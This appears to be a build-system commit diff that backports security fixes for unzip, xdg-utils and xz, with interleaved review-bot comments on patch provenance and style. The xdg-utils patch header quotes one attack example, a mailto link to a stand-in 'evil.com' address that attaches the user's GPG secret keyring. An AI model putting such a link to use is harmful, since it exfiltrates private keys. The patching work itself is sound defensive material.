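+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
+From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
+From: Nils Bars <nils.bars@t-online.de>
+Date: Mon, 17 Jan 2022 16:53:16 +0000
+Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
+
+This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
+to read as many bytes as indicated by the extra field length attribute.
+Furthermore, this fixes a null pointer dereference if an archive contains an
+`EF_UNIPATH` extra field but does not have a filename set.
+---
+ fileio.c | 5 ++++-
+ process.c | 6 +++++-
+ 2 files changed, 9 insertions(+), 2 deletions(-)
+---
+
+Patch from:
+https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
+https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
+Regenerated to apply without offsets.
+
+CVE: CVE-2021-4217
+
+Upstream-Status: Pending [infozip upstream inactive]
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+
+
+diff --git a/fileio.c b/fileio.c
+index 14460f3..1dc319e 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
+ (G.inptr-G.inbuf) + length);
+ } else {
+- if (readbuf(__G__ (char *)G.extra_field, length) == 0)
++ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
++ if (bytes_read == 0)
+ return PK_EOF;
++ if (bytes_read != length)
++ return PK_ERR;
+ /* Looks like here is where extra fields are read */
+ if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
+ {
+diff --git a/process.c b/process.c
+index 5f8f6c6..de843a5 100644
+--- a/process.c
++++ b/process.c
+@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
+ G.unipath_checksum = makelong(offset + ef_buf);
+ offset += 4;
+
++ if (!G.filename_full) {
++ /* Check if we have a unicode extra section but no filename set */
++ return PK_ERR;
++ }
++
+ /*
+ * Compute 32-bit crc
+ */
+-
+ chksum = crc32(chksum, (uch *)(G.filename_full),
+ strlen(G.filename_full));
+
+--
+2.32.0
+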
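Review bot: In the fileio.c hunk, the new `return PK_ERR;` on a short read leaves `G.extra_field` pointing at a buffer whose tail was never written, so the uninitialised bytes stay reachable through the global if any caller carries on after the error. The allocation and the callers are outside the hunk (do_string continues past both edges), so this needs confirming against the full function. Releasing the buffer before returning would make the error path safe either way: `free(G.extra_field); G.extra_field = NULL; return PK_ERR;`.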
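--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0529
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/process.c b/process.c
+index d2a846e..99b9c7b 100644
+--- a/process.c
++++ b/process.c
+@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
+ char buf[9];
+ char *buffer = NULL;
+ char *local_string = NULL;
++ size_t buffer_size;
+
+ for (wsize = 0; wide_string[wsize]; wsize++) ;
+
+ if (max_bytes < MAX_ESCAPE_BYTES)
+ max_bytes = MAX_ESCAPE_BYTES;
+
+- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
++ buffer_size = wsize * max_bytes + 1;
++ if ((buffer = (char *)malloc(buffer_size)) == NULL) {
+ return NULL;
+ }
+
+@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
+ /* no MB for this wide */
+ /* use escape for wide character */
+ char *escape_string = wide_to_escape_string(wide_string[i]);
+- strcat(buffer, escape_string);
++ size_t buffer_len = strlen(buffer);
++ size_t escape_string_len = strlen(escape_string);
++ if (buffer_len + escape_string_len + 1 > buffer_size)
++ escape_string_len = buffer_size - buffer_len - 1;
++ strncat(buffer, escape_string, escape_string_len);
+ free(escape_string);
+ }
+ }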
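Review bot: This patch file carries no `Signed-off-by:` line, no author and no description of the change, only a bug URL and the two tags; CVE-2022-0530.patch in the same commit has the same gap, while CVE-2021-4217.patch beside them has all three. For a security backport that provenance is what lets a later auditor tell who imported the fix and from where, so the header should gain a short subject, the origin of the diff and a sign-off, e.g. `Signed-off-by: Name <email>` (placeholder). The value `Upstream-Status: Inactive-Upstream [need a new release]` also differs from the `Pending [infozip upstream inactive]` used in CVE-2021-4217.patch; the same upstream state should carry the same tag in all three files.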
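--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0530
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/fileio.c b/fileio.c
+index 6290824..77e4b5f 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ /* convert UTF-8 to local character set */
+ fn = utf8_to_local_string(G.unipath_filename,
+ G.unicode_escape_all);
++ if (fn == NULL)
++ return PK_ERR;
++
+ /* make sure filename is short enough */
+ if (strlen(fn) >= FILNAMSIZ) {
+ fn[FILNAMSIZ - 1] = '\0';
+diff --git a/process.c b/process.c
+index d2a846e..715bc0f 100644
+--- a/process.c
++++ b/process.c
+@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
+ int escape_all;
+ {
+ zwchar *wide = utf8_to_wide_string(utf8_string);
++ if (wide == NULL)
++ return NULL;
+ char *loc = wide_to_local_string(wide, escape_all);
+ free(wide);
+ return loc;
+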
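Review bot: In the process.c hunk the new `if (wide == NULL) return NULL;` sits between two declarations, so `char *loc = ...` becomes a declaration after a statement. The surrounding code uses old-style function definitions, visible in `utf8_to_local_string(utf8_string, escape_all)` with `int escape_all;` below it, and a C89 compiler or a build with `-Werror=declaration-after-statement` would reject the mix. Declaring first keeps both the check and the file's style: `char *loc;` then `if (wide == NULL) return NULL;` then `loc = wide_to_local_string(wide, escape_all);`. The function's closing brace is outside the hunk.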
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb
index c1ea0a9a2c..fa57c8f5bd 100644
--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Utilities for extracting and viewing files in .zip archives" 1SUMMARY = "Utilities for extracting and viewing files in .zip archives"
2HOMEPAGE = "http://www.info-zip.org" 2HOMEPAGE = "http://www.info-zip.org"
3DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
3SECTION = "console/utils" 4SECTION = "console/utils"
4LICENSE = "BSD-3-Clause" 5LICENSE = "BSD-3-Clause"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
25 file://CVE-2019-13232_p1.patch \ 26 file://CVE-2019-13232_p1.patch \
26 file://CVE-2019-13232_p2.patch \ 27 file://CVE-2019-13232_p2.patch \
27 file://CVE-2019-13232_p3.patch \ 28 file://CVE-2019-13232_p3.patch \
29 file://CVE-2021-4217.patch \
30 file://CVE-2022-0529.patch \
31 file://CVE-2022-0530.patch \
28" 32"
29UPSTREAM_VERSION_UNKNOWN = "1" 33UPSTREAM_VERSION_UNKNOWN = "1"
30 34
31SRC_URI[md5sum] = "62b490407489521db863b523a7f86375" 35SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
32SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37" 36SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
33 37
38# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
39CVE_CHECK_WHITELIST += "CVE-2008-0888"
40
34# exclude version 5.5.2 which triggers a false positive 41# exclude version 5.5.2 which triggers a false positive
35UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz" 42UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
36 43
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb
index beebb5b004..0adf1fbb41 100644
--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -21,7 +21,6 @@ SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c
21# Can be dropped when the output next changes, avoids failures after 21# Can be dropped when the output next changes, avoids failures after
22# reproducibility issues 22# reproducibility issues
23PR = "r1" 23PR = "r1"
24HASHEQUIV_HASH_VERSION .= ".1"
25 24
26UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/" 25UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
27UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/" 26UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"
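--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+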
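Review bot: The patch is stored under a bare commit hash and its `Upstream-Status: Backport` tag carries no reference, so only the `CVE: CVE-2020-27748` line inside the file ties it to the CVE it fixes. CVE-2022-4055.patch, added to the same recipe, shows the convention: a CVE-named file and `Upstream-Status: Backport [<upstream commit URL>]`. Renaming this file to `CVE-2020-27748.patch`, adding the commit URL in brackets and a `Signed-off-by:` from whoever imported it (the only sign-off present is the original author's) would make the fix traceable from the recipe's `SRC_URI` alone.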
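--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
+From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
+From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
+Date: Thu, 25 Aug 2022 23:51:45 +0200
+Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
+ CVE-2020-27748, CVE-2022-4055)
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
+CVE: CVE-2022-4055
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ scripts/xdg-email.in | 108 -------------------------------------------
+ 1 file changed, 108 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 13ba2d5..b700679 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -30,76 +30,8 @@ _USAGE
+
+ #@xdg-utils-common@
+
+-run_thunderbird()
+-{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+- THUNDERBIRD="$1"
+- MAILTO=$(echo "$2" | sed 's/^mailto://')
+- echo "$MAILTO" | grep -qs "^?"
+- if [ "$?" = "0" ] ; then
+- MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+- else
+- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+- fi
+-
+- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+- if [ -z "$TO" ] ; then
+- NEWMAILTO=
+- else
+- NEWMAILTO="to='$TO'"
+- fi
+- if [ -n "$CC" ] ; then
+- NEWMAILTO="${NEWMAILTO},cc='$CC'"
+- fi
+- if [ -n "$BCC" ] ; then
+- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+- fi
+- if [ -n "$SUBJECT" ] ; then
+- NEWMAILTO="${NEWMAILTO},$SUBJECT"
+- fi
+- if [ -n "$BODY" ] ; then
+- NEWMAILTO="${NEWMAILTO},$BODY"
+- fi
+-
+- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+- "$THUNDERBIRD" -compose "$NEWMAILTO"
+- if [ $? -eq 0 ]; then
+- exit_success
+- else
+- exit_failure_operation_failed
+- fi
+-}
+-
+ open_kde()
+ {
+- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+- local kreadconfig=kreadconfig$KDE_SESSION_VERSION
+- else
+- local kreadconfig=kreadconfig
+- fi
+-
+- if which $kreadconfig >/dev/null 2>&1; then
+- local profile=$($kreadconfig --file emaildefaults \
+- --group Defaults --key Profile)
+- if [ -n "$profile" ]; then
+- local client=$($kreadconfig --file emaildefaults \
+- --group "PROFILE_$profile" \
+- --key EmailClient \
+- | cut -d ' ' -f 1)
+-
+- if echo "$client" | grep -Eq 'thunderbird|icedove'; then
+- run_thunderbird "$client" "$1"
+- fi
+- fi
+- fi
+-
+ local command
+ case "$KDE_SESSION_VERSION" in
+ '') command=kmailservice ;;
+@@ -130,15 +62,6 @@ open_kde()
+
+ open_gnome3()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -159,13 +82,6 @@ open_gnome3()
+
+ open_gnome()
+ {
+- local client
+- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -231,15 +147,6 @@ open_flatpak()
+
+ open_generic()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ xdg-open "$1"
+ local ret=$?
+
+@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
+ shift
+ ;;
+
+- --attach)
+- if [ -z "$1" ] ; then
+- exit_failure_syntax "file argument missing for --attach option"
+- fi
+- check_input_file "$1"
+- file=`readlink -f "$1"` # Normalize path
+- if [ -z "$file" ] || [ ! -f "$file" ] ; then
+- exit_failure_file_missing "file '$1' does not exist"
+- fi
+-
+- url_encode "$file"
+- options="${options}attach=${result}&"
+- shift
+- ;;
+-
+ -*)
+ exit_failure_syntax "unexpected option '$parm'"
+ ;;
+--
+2.25.1
+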
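Review bot: The last hunk (`@@ -364,21 +271,6 @@`) deletes the `--attach)` case, so an invocation with `--attach FILE` now appears to land in the `-*)` branch kept as context and exit with `unexpected option`. Neither the subject nor the patch header mentions that a command-line option disappears, and the `_USAGE` text lies outside the hunks, so it may still advertise an option the script rejects. A header line such as `Note: this also removes the --attach option; callers that pass it now fail with a syntax error.` would tell integrators what to check in their images before taking the fix.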
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..f6989430f5 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
20SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ 20SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
21 file://0001-Reinstate-xdg-terminal.patch \ 21 file://0001-Reinstate-xdg-terminal.patch \
22 file://0001-Don-t-build-the-in-script-manual.patch \ 22 file://0001-Don-t-build-the-in-script-manual.patch \
23 file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
24 file://CVE-2022-4055.patch \
23 " 25 "
24 26
25SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" 27SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
index 6e43f5be6f..765a34e842 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Socket-based service activation daemon" 1SUMMARY = "Socket-based service activation daemon"
2HOMEPAGE = "https://github.com/xinetd-org/xinetd" 2HOMEPAGE = "https://github.com/xinetd-org/xinetd"
3DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
3 4
4# xinetd is a BSD-like license 5# xinetd is a BSD-like license
5# Apple and Gentoo say BSD here. 6# Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
12# Blacklist a bogus tag in upstream check 13# Blacklist a bogus tag in upstream check
13UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" 14UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
14 15
15SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ 16SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
16 file://xinetd.init \ 17 file://xinetd.init \
17 file://xinetd.conf \ 18 file://xinetd.conf \
18 file://xinetd.default \ 19 file://xinetd.default \
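--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
+From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Tue, 29 Mar 2022 19:19:12 +0300
+Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
+
+Malicious filenames can make xzgrep to write to arbitrary files
+or (with a GNU sed extension) lead to arbitrary code execution.
+
+xzgrep from XZ Utils versions up to and including 5.2.5 are
+affected. 5.3.1alpha and 5.3.2alpha are affected as well.
+This patch works for all of them.
+
+This bug was inherited from gzip's zgrep. gzip 1.12 includes
+a fix for zgrep.
+
+The issue with the old sed script is that with multiple newlines,
+the N-command will read the second line of input, then the
+s-commands will be skipped because it's not the end of the
+file yet, then a new sed cycle starts and the pattern space
+is printed and emptied. So only the last line or two get escaped.
+
+One way to fix this would be to read all lines into the pattern
+space first. However, the included fix is even simpler: All lines
+except the last line get a backslash appended at the end. To ensure
+that shell command substitution doesn't eat a possible trailing
+newline, a colon is appended to the filename before escaping.
+The colon is later used to separate the filename from the grep
+output so it is fine to add it here instead of a few lines later.
+
+The old code also wasn't POSIX compliant as it used \n in the
+replacement section of the s-command. Using \<newline> is the
+POSIX compatible method.
+
+LC_ALL=C was added to the two critical sed commands. POSIX sed
+manual recommends it when using sed to manipulate pathnames
+because in other locales invalid multibyte sequences might
+cause issues with some sed implementations. In case of GNU sed,
+these particular sed scripts wouldn't have such problems but some
+other scripts could have, see:
+
+ info '(sed)Locale Considerations'
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Thanks to Jim Meyering and Paul Eggert discussing the different
+ways to fix this and for coordinating the patch release schedule
+with gzip.
+
+Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ src/scripts/xzgrep.in | 20 ++++++++++++--------
+ 1 file changed, 12 insertions(+), 8 deletions(-)
+
+diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
+index a1fd19c..da1e65b 100644
+--- a/src/scripts/xzgrep.in
++++ b/src/scripts/xzgrep.in
+@@ -178,22 +178,26 @@ for i; do
+ { test $# -eq 1 || test $no_filename -eq 1; }; then
+ eval "$grep"
+ else
++ # Append a colon so that the last character will never be a newline
++ # which would otherwise get lost in shell command substitution.
++ i="$i:"
++
++ # Escape & \ | and newlines only if such characters are present
++ # (speed optimization).
+ case $i in
+ (*'
+ '* | *'&'* | *'\'* | *'|'*)
+- i=$(printf '%s\n' "$i" |
+- sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
+- ');;
++ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
+ esac
+- sed_script="s|^|$i:|"
++
++ # $i already ends with a colon so don't add it here.
++ sed_script="s|^|$i|"
+
+ # Fail if grep or sed fails.
+ r=$(
+ exec 4>&1
+- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
++ (eval "$grep" 4>&-; echo $? >&4) 3>&- |
++ LC_ALL=C sed "$sed_script" >&3 4>&-
+ ) || r=2
+ exit $r
+ fi >&3 5>&-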
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb
index 1c4450a9e9..6d80a4f2e9 100644
--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Utilities for managing LZMA compressed files" 1SUMMARY = "Utilities for managing LZMA compressed files"
2HOMEPAGE = "https://tukaani.org/xz/" 2HOMEPAGE = "https://tukaani.org/xz/"
3DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
3SECTION = "base" 4SECTION = "base"
4 5
5# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file 6# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
22 file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \ 23 file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
23 " 24 "
24 25
25SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz" 26SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
27 file://CVE-2022-1271.patch \
28 "
26SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6" 29SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
27SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145" 30SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
28UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar" 31UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb
index 97e5e57533..18b5d8648e 100644
--- a/meta/recipes-extended/zip/zip_3.0.bb
+++ b/meta/recipes-extended/zip/zip_3.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Compressor/archiver for creating and modifying .zip files" 1SUMMARY = "Compressor/archiver for creating and modifying .zip files"
2HOMEPAGE = "http://www.info-zip.org" 2HOMEPAGE = "http://www.info-zip.org"
3DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
3SECTION = "console/utils" 4SECTION = "console/utils"
4 5
5LICENSE = "BSD-3-Clause" 6LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
index ddb4c2794f..f43bfd6a67 100644
--- a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
+++ b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
@@ -1,4 +1,7 @@
1SUMMARY = "WebKit based web browser for GNOME" 1SUMMARY = "WebKit based web browser for GNOME"
2DESCRIPTION = "Epiphany is an open source web browser for the Linux desktop environment. \
3It provides a simple and easy-to-use internet browsing experience."
4HOMEPAGE = "https://wiki.gnome.org/Apps/Web"
2BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany" 5BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany"
3LICENSE = "GPLv3+" 6LICENSE = "GPLv3+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 7LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -13,6 +16,7 @@ REQUIRED_DISTRO_FEATURES = "x11 opengl"
13 16
14SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \ 17SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \
15 file://0002-help-meson.build-disable-the-use-of-yelp.patch \ 18 file://0002-help-meson.build-disable-the-use-of-yelp.patch \
19 file://CVE-2022-29536.patch \
16 " 20 "
17SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b" 21SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b"
